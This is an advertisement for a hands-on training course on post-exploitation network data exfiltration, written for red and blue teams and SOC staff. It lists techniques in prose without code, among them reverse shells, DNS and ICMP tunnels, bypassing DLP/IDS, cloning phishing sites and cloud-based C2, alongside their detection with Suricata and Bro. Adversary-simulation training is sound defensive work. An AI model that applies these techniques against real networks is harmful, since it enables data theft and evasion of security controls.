The Post Exploitation Adversary Simulations – Network Data Exfiltration Techniques training class has been designed to present students the modern and emerging tools and techniques available for network data exfiltration, testing and bypassing DLP/IDS/IPS/FW systems, protocol tunneling, hiding, pivoting and generating malicious network events. Highly technical content and only a hands-on practical approach guarantees that the usage of this transferred knowledge & technologies in real production environments will be easy, smooth and repeatable.
As for the introduction we will cover the latest APT-style campaigns using malware samples, analyze the top C2 network communication techniques seeing in the wild and map the findings directly to ATT&CK Framework, kill chain methodology and defense in depth strategy. We will also go slightly(with live examples OFC!) through the importance of network baselining, memory forensics, automated malware analysis systems and finally the real threat simulation tactics which are the key important aspects of this training.
Next, we will deep dive into the individual network protocols, services and techniques commonly in use by adversaries in corporate networks and discuss the characteristic security detection features. Using available set of tools (more than 50 different tools and frameworks – check the Keywords section list below), the student will play one by one with well prepared exfiltration, pivoting and tunneling use-cases to generate the true network symptoms of modern attacker behavior.
Who Should Attend:
- Red and Blue team members
- Security / Data Analytics
- CIRT / Incident Response Specialists
- Network Security Engineers
- SOC members and SIEM Engineers
- AI / Machine Learning Developers
- Chief Security Officers and IT Security Directors
- Fundament knowledge of TCP/IP network protocols
- Penetration testing experience performing enumeration, exploiting, and lateral
movement is beneficial, but not required
- Basic programming skills is a plus, but not essential
- At least 20GB of free disk space
- At least 8GB of RAM
- Students should have the latest Virtualbox installed on their machine
- Full Admin access on your laptop
Key Learning Objectives:
We will explore in details how to:
- run a different types of TCP/UDP reverse and bind shells across Windows and Linux systems, pivot to the next subnets, configure a port forwarding & proxying and find what are the network traffic artifacts of such actions
- manually generate a single malicious packets, ex. to saturate a DHCP server using Python, flood the network service from C code or start a BF by using hydra or medusa
- generate your own malicious payloads and raw TCP/UDP custom encrypted traffic channels undetectable by security products
- simulate DNS DGA traffic, run a DNS TXT tunnels and remote shells, exfiltrate data using DNS MX and how to gain the Internet connection on the plane or in the hotel for free!
- clone, armor and phish popular websites
- achieve a big file ICMP packet dripping covert channel and monitor ICMP traffic
- use a different HTTP headers and methods for stealing the data also with
combination of web application injection techniques and walk through the world of
- detect and understand a TLS/SSL-based anomalies and exfiltration methods
- run a Powershell scripts in post-exploitation stage for leaking the data and bypass
- cheat a security platforms by running internal WMI, Websockets, VOIP or P2P covert
- hide a stolen data in binary file, WAV file, Image file or exfiltrate data from air-gapped
system using hops
- configure the station to connect to anonymizers like external VPN, TOR, Open proxy
and ‘ping’ to the IP/domains tagged on the globally recognized security feeds, rules
or phishy lists
- use a popular cloud-based services for C2 communication and data stealing, ex.
Pastebin, Twitter, AWS and many more
- replay a malicious PCAP files and in terms of network behaviour and analyze the
malware samples using Cuckoo
- the syntax of signature-based rules works, how Suricata or Bro IDS can help you
detect adversary tactics and what are the differences between this two IDS engines
- and a combination of many, many more.
Through hands-on lab exfiltration, this training delivers you a bigger picture of what you really need to care about when thinking initially or improving lately your SOC environment or Red and Blue team skills, your SIEM deployments, your DLP/IDS/IPS installations or Machine-Learning and anomaly detection security solutions.
All the above training description is based on pure hands-on laboratory where student will run every single action or chained scenarios on his own in the dedicated virtual-lab network.
This class will focus on x86/x64 architecture, IPv4/IPv6 networks and target Linux and Windows environments. In terms of IDS/IPS/Data Leakage Protection and for better understanding the current status of your network security posture, the training experience will help you understand risks, identify network security blind spots and unexpected, uncovered spaces by simulating a real, offensive cyber adversary network behavior. Become confident that your network security really works!